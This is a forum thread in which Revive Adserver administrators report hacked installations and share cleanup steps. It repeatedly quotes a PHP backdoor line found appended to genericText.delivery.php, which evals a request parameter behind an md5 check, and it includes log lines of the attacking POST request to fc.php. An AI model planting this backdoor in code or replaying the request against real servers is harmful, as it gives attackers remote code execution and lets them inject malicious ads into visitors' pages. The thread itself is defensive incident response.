Mobile ads have been hijacked

[sunech]

Sorry @Matteo Beccati, didn't see your e-mail. I have deleted the line below from genericText.delivery.php now:
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='ae897e2de15145e2089d89aff19b78a7'){@eval($_REQUEST['zoneId']);}
Thank you for your assistance!

I checked the file via stat and can see that it was changed December 22nd 2018 at 00:33, despite the modified timestamp matching the revive installation.
@Snaggy / @tvvpmi could you check if it is the same with your genericText.delivery.php and if so, if you have log data for the time it was changed?

[Snaggy]

My genericText.delivery file has this line...

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='6f3ba4fbec5bfe3817fc319f3031fdaa'){@eval($_REQUEST['zoneId']);}
?>

I take it that this should be deleted?

[Matteo Beccati]

@Snaggy yes, absolutely. An/or you can find a pristine file in etc/plugins/openXBannerTypes.zip. The zipfile can be used together with the "Import" button in the plugin screen to overwrite the existing files.

[Snaggy]

OK thanks Matteo!

Q. Where would I look to find log data to see when this file was modified?

[tvvpmi]

6 hours ago, Ian vM said:

@tvvpmi which version are you running ? did you upgrade from an older version in the past too ?

Last one 4.1.4

I have upgrade from prior version. But this instalation comes from an old instalation. 2.8 series

 

I have modify the fc.php script to log post parameters. I'm waiting now for a new POST to check what we are receiving and to try reproduce the attack

[tvvpmi]

3 hours ago, sunech said:

Sorry @Matteo Beccati, didn't see your e-mail. I have deleted the line below from genericText.delivery.php now:
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='ae897e2de15145e2089d89aff19b78a7'){@eval($_REQUEST['zoneId']);}
Thank you for your assistance!

I checked the file via stat and can see that it was changed December 22nd 2018 at 00:33, despite the modified timestamp matching the revive installation.
@Snaggy / @tvvpmi could you check if it is the same with your genericText.delivery.php and if so, if you have log data for the time it was changed?

Same here.

From stat genericText.delivery.php
 2018-12-22 08:51:50.724940460 +0100

[Ian]

fyi, it's not difficult to preserve timestamps on linux (not sure on any other OS's), that's nothing special

[tvvpmi]

15 minutes ago, tvvpmi said:

Same here.

From stat genericText.delivery.php
 2018-12-22 08:51:50.724940460 +0100

Like in @snaggy case, this line has been added at the end of genericText.delivery.php

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

[tvvpmi]

16 hours ago, tvvpmi said:

I have modify the fc.php script to log post parameters. I'm waiting now for a new POST to check what we are receiving and to try reproduce the attack

I have more info. I just have received another attack just now. I have the POST parameters the attacker is using. Some of admin is interested in receiving them?

[Ian]

the post to fc.php ? 

[tvvpmi]

1 minute ago, Ian vM said:

the post to fc.php ? 

yes

[Ian]

sure if you can send it to me, i'll check if it's comparable with the other report we've received

[tvvpmi]

Message sent directly to @Ian vM

Edited January 7, 2019 by tvvpmi

[vinmhas]

We are having the exact problem and symptoms:

• Injection in the zones table of the Revive database.
• The file genericText.delivery.php has been compromised.
• I found the following suspicious entries in the NGINX log-file:

176.31.187.82 - - [17/Dec/2018:10:07:33 +0100] "POST /adxmlrpc.php HTTP/1.1" 200 11329 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 0.210 x.x.x.x -
176.31.187.82 - - [17/Dec/2018:10:07:36 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 76 "https://google.com/serach?q=https://adsserver.xxx/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)" 0.439 x.x.x.x -

Running an upgraded Revive 4.1.3. Have been upgrading every version since 2011. ( when it was still called Open-X )

[Ian]

@vinmhas thanks for your report

[tvvpmi]

Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php

Problably it has been modified, adding a line like this at the end:

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

You have to remove it. 

Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM

Clean the prepend code of your zones ...  via sql o through the revive backend. Search for iframes and javascript codes.

Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them

[vinmhas]

Thank you @tvvpmi. That did the trick!

I've been searching through a database-dump of the database for traces of suspicious JavaScript or iframes, but they only tempered with one specific ad for some reason. There were no PHP-files in the images folder though..
Like you've suggested: I've removed the ability to execute PHP-files in the images-folder, and the installation haven't been compromised since.

[rmu]

I had the same issue. The injection also changed my DB structure for the append column in the ox_zones  table. No other files were modified, but I do believe the code put in the file, did the other modification to put in the code that was added to the append column

I did also have another issue where an intruder logged into our system, the log said as me, and added code the mobile redirection directly to the ad creative.  I added a different admin user, and removed my old one... I also reinstalled revive-adserver. 

I haven't seen any traffic since then of people poking around my admin area. Just tonight someone tried to do the fc.php injection. I already have php execution disabled in my images folder. The difference now is the permissions on the plugins folder. They are unable to write to that file now.

 

[oh_hello]

Same problem happened to me.

• Only one of my ad zones had that nasty code added to the prepend column, but I've manually deleted it.
• The genericText.delivery.php file had that extra line of code at the end which I've deleted.
• I had a php file in the www/images directory which I've removed. I have a backup of this php file if @Ian vM or any admin would like to see it? I've been using a separate directory to serve image ads for a long time, and that directory didn't have any extra php file in it

I can change admin account passwords and the database password. Any other recommendations to prevent this attack in the future?

Thanks.

[TYWeb]

On 1/9/2019 at 5:07 AM, tvvpmi said:

Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php

Problably it has been modified, adding a line like this at the end:

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

You have to remove it. 

Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM

Clean the prepend code of your zones ...  via sql o through the revive backend. Search for iframes and javascript codes.

Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them

So is the problem a compromised plug in? genericText.delivery.php

If I do everything you say will that basically prevent this from happening again?

I have the same issue that popped up and I just want to be sure its plugged.

[TYWebmaster]

On 1/9/2019 at 5:07 AM, tvvpmi said:

Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php

Problably it has been modified, adding a line like this at the end:

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

You have to remove it. 

Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM

Clean the prepend code of your zones ...  via sql o through the revive backend. Search for iframes and javascript codes.

Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them

I have tried all this and some how they are still getting on my system altering the Append/Prepend even after I have turned it off in the DB, please help!!

[szeidler]

How is the security issue handled by the revive team? Is there research going on, on that matter, that is not discussed public?
We have experienced the hijacked ad zones too in 2 of our installations. As unauthorized Javascript (when using async invocation method not in an iframe) got injected into the clients page it's a critical security matter, because it has direct access to the page and the user interactions (harvesting user data, in case ads have been displayed on forms). For that reason we might need to escalate the incident to the authorities because of legal reasons. 

[jacopotediosi]

Good morning to all
I'm currently having the same problem with my Revive Adserver installation updated at the last version (4.1.4).
Someone makes POST requests to /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank and is able to adds code to plugins/bannerTypeText/oxText/genericText.delivery.php and to upload backdoor php scripts inside /www/images/
I temporarily solved disabling PHP Engine inside the image folder and adding two lines of code inside fc.php to log POST request.
@tvvpmi maybe can you send to me your logged POST requests while I'm waiting to be attacked again?
I want to reverse this attack in order to understand how it works and to help Revive support team to fix it

[Matteo Beccati]

Research is still ongoing: we are in touch with a few affected users, but until now we haven't received enough evidence to understand how the malicious plugin or the php files in the images folder are being planted.

[TYWebmaster]

9 hours ago, Matteo Beccati said:

Research is still ongoing: we are in touch with a few affected users, but until now we haven't received enough evidence to understand how the malicious plugin or the php files in the images folder are being planted.

I know this may sounds crazy but I think how ever they have hacked in, they now have access to the DB or there is something in the DB thats giving them access, I have removed the line from genericText.delivery.php, turned off the ability to use PHP in the image folder, removed any PHP files from the image folder, went into the database and varchar(0) the prepend/append in the zones and banners, change password for the DB and the Site Admin and 12 hrs later the attack is back, the varchar is changed back to text in the prepend and 3 of my zones have code added back.

I really need to know how to at least lock them out from adding that code. So far all the recommendations have been  done and its still coming back.

I would be willing to let you team take a look at our ads server and DB at anytime if it will help this get resolved.

Edited February 19, 2019 by TYWebmaster